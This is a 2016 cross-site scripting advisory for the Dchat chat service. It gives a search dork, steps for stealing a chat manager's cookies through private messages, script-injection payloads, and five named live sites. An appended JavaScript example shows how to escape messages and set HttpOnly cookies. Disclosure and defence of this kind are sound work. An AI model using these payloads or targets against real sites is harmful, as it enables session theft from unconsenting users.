Dchat Service Cross Site Scripting

2016.03.12
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

* Exploit Title: Dchat Service Cross Site Scripting
* Discovery Date: 2016/03/10
* Dork: intext: intext:"طراحی قالب اختصاصی توسط : دی چت"
* Public Disclosure Date: 2016/03/12
* Exploit Author: Guardiran Security Team
* Contact: http://guardiran.org
* Vendor Homepage: http://dchat.org/
* Software Link: [-]
* Version: All Version
* Tested on: Dchat Chatrooms
* Category: webapps

Description
======================================================================
About Dchat Service:
Dchat is a chat service provider. Dchat is the best service provider, with high security and 24-hour support.

A cross-site scripting vulnerability occurs in the private chat panel.
This panel can be used to obtain the cookies of each user.

Exploit:
First, we have to register as a common user.
Next, you need to select a user (such as the chat General Manager) and use the private chat panel.
Then, using a script placed to extract cookies, do Hacking Website.
Good Luck

PoC
======================================================================
XSS
~~~~~~~~~~~~~~
method="post"
Function=Panel Private Messages
Accept: aplication/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
content-Type: Application/x-www-from-urlencoded; charset=UTF-8

-- response --
HTTP/1.1 200OK
Server nginx/1.4.6 (Ubuntu)
Date: Thu, 10 mar 2016 19:18:47 GMT
Content-Type: text/html
Transfer-Encoding: Chunked
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Expires: Thu, 19 Nov 1981 08:51:00 GMT
Cache-Control: no=store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragme: no-cache
Content-encoing: gzip

Payload:
======================================================================
<script>alert('Xss')</script>
or
"><script>alert('Xss')</script>

Demo:
======================================================================
* http://www.emrischat.org/
* http://www.yashilchat.com/
* http://www.toranchat.ir/
* http://www.faytunchat.com/
* http://www.metanatchat.ir/

* Discovered By: MR.IMAN
* We Are Guardiran Security Team
* Special Thanks: C0d3!nj3ct!0n, REX, MR.IMAN, GrYpHoN, alizombie, ColEctOR,
* MRSEZAR and all members of Guardiran Security Team
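The advisory says markup sent through the private chat panel is rendered as script and can reach users' cookies. The following is an added example, not Dchat code and not from the advisory's authors: it output-encodes a private message before rendering and marks the session cookie HttpOnly, then runs the advisory's two payloads through the renderer. The function names, the data-sender attribute and the PHPSESSID cookie name are assumptions made for illustration.

```javascript
// Added example, not Dchat code: all names here are hypothetical.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode every character that can change HTML parsing state. Encoding both
// quote styles keeps the result safe in element content and quoted attributes.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Render one private message. The sender lands in a quoted attribute and the
// body in element content, the two contexts the advisory's payloads target.
function renderPrivateMessage(sender, body) {
  return `<div class="pm" data-sender="${escapeHtml(sender)}">${escapeHtml(body)}</div>`;
}

// Build a session cookie header. HttpOnly hides the cookie from document.cookie,
// so a script that still gets injected cannot read the session identifier.
function sessionCookie(name, value) {
  if (!/^[A-Za-z0-9_-]+$/.test(name) || !/^[A-Za-z0-9_-]+$/.test(value)) {
    throw new Error('unexpected characters in cookie name or value');
  }
  return `${name}=${value}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// The two payloads quoted in the advisory.
const ADVISORY_PAYLOADS = ["<script>alert('Xss')</script>", "\"><script>alert('Xss')</script>"];

// True when the fragment contains only the <div>...</div> pair the renderer
// wrote, meaning no attacker-supplied tag survived encoding.
function isInert(html) {
  const tags = html.match(/<[a-zA-Z/][^>]*>/g) || [];
  return tags.length === 2 && tags[0].startsWith('<div ') && tags[1] === '</div>';
}

// Render each advisory payload as both sender and body and report the result.
function demo() {
  return ADVISORY_PAYLOADS.map((p) => {
    const html = renderPrivateMessage(p, p);
    return { html, inert: isInert(html) };
  });
}

for (const r of demo()) console.log(r.inert, r.html);
console.log(sessionCookie('PHPSESSID', 'constructed-sample-id')); // constructed value
```

Encoding has to happen at render time for every place the message is shown; HttpOnly only limits what an injected script can read and does not remove the injection.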

